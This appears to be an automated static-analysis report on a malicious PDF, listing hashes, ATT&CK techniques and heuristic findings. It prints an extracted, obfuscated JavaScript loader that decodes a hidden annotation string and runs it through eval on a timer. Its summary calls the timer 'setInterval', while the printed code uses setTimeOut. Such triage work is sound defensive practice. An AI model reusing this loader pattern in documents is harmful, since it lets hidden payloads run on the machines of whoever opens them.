PDF static analysis report

Static analysis result for SHA-256 6e65233b29f49580…

SUSPICIOUS

PDF

37.8 KB Created: 2010-04-14 00:21:26 +04:00 Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org)) First seen: 2026-05-10
MD5: 875b2c03d4ae87f265bb8555abb8c5b5 SHA-1: 61e92efb63199b96ab1d5bb04ff9d756d786f9f0 SHA-256: 6e65233b29f49580645505fd15e2ea6bb92e815a6bdab87c3bcb339215129511
56 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript that is heavily obfuscated using character code manipulation and string concatenation. The script decodes a string using a base value of 237 and then executes it using `app.setInterval`. This pattern is commonly used to download and execute a second-stage payload. The ML classifier also flagged this PDF as malicious with high confidence.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x8CDA 1346 bytes
SHA-256: 4f4032a2182b874f3b1232f2f4b72c085ae0e07605dea9074b0b6fe9b9735275
Preview script
First 1,000 lines of the extracted script
�� v a r   B k G b x Z l F z   =   2 3 7 ; 
 v a r   B 3 F h h E B z   =   t h i s . g e t A n n o t ( 0 ,   " 0 0 0 1 - 0 0 0 4 " ) ; 
 i f (   B 3 F h h E B z   ! =   n u l l )   { 
         A 9 j y J e 8   =   B 3 F h h E B z . s u b j e c t ; 
 } 
 A 9 j y J e 8   =   A 9 j y J e 8 . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' ; ' ) ; 
 A 9 j y J e 8   =   A 9 j y J e 8 . r e p l a c e ( / ; ; / g , ' ' ) ; 
 f u n c t i o n   R 0 L W M Z 2 j b I 2 g   (   W 2 g n J i U e z s g V ,   g i 4 b T B D 7 a B Q r   )   {   
 v a r   h X s 4 s   =   n e w   S t r i n g ( ) ; v a r   r n w R k P M B 5 i   =   n e w   S t r i n g ( ) ; 
 F D R o X   =   W 2 g n J i U e z s g V   . s p l i t ( ' ; ' ) ; 
 f o r ( v v X q C 0 o l   =   0 ;   v v X q C 0 o l   <   F D R o X . l e n g t h - 1 ; v v X q C 0 o l + + )   { 
 P 4 l w b e z T =   S t r i n g [ ' f r o m ' + ' C h a r ' + ' C o d e ' ] ( F D R o X [ v v X q C 0 o l ]   -   g i 4 b T B D 7 a B Q r ) ; 
 r n w R k P M B 5 i   =   r n w R k P M B 5 i   +   P 4 l w b e z T ; }   r e t u r n   r n w R k P M B 5 i ; } ; 
 v n Q k X p 8 i   =   R 0 L W M Z 2 j b I 2 g ( A 9 j y J e 8 , B k G b x Z l F z ) ; 
 v a r   t   =   ' a ' ; 
 v a r   d   =   ' u ' ; 
 l i b b b   =     a p p [ ' s e t ' + ' T i m e O '   +   d   + ' t ' ] ( " e v " + t + " l ( v n Q k X p 8 i ) " ,   1 0 0 ) ;
stream_001_off00008cda.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x8CDA 672 bytes
SHA-256: 8f98b621fb93e8c8b0eac8b0b27f9668536e5f68be52b3e5738ae14120777987
Detection
ClamAV: No threats found
Obfuscation or payload: likely
9 of 17 identifiers look randomly generated (e.g. 'gi4bTBD7aBQr'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.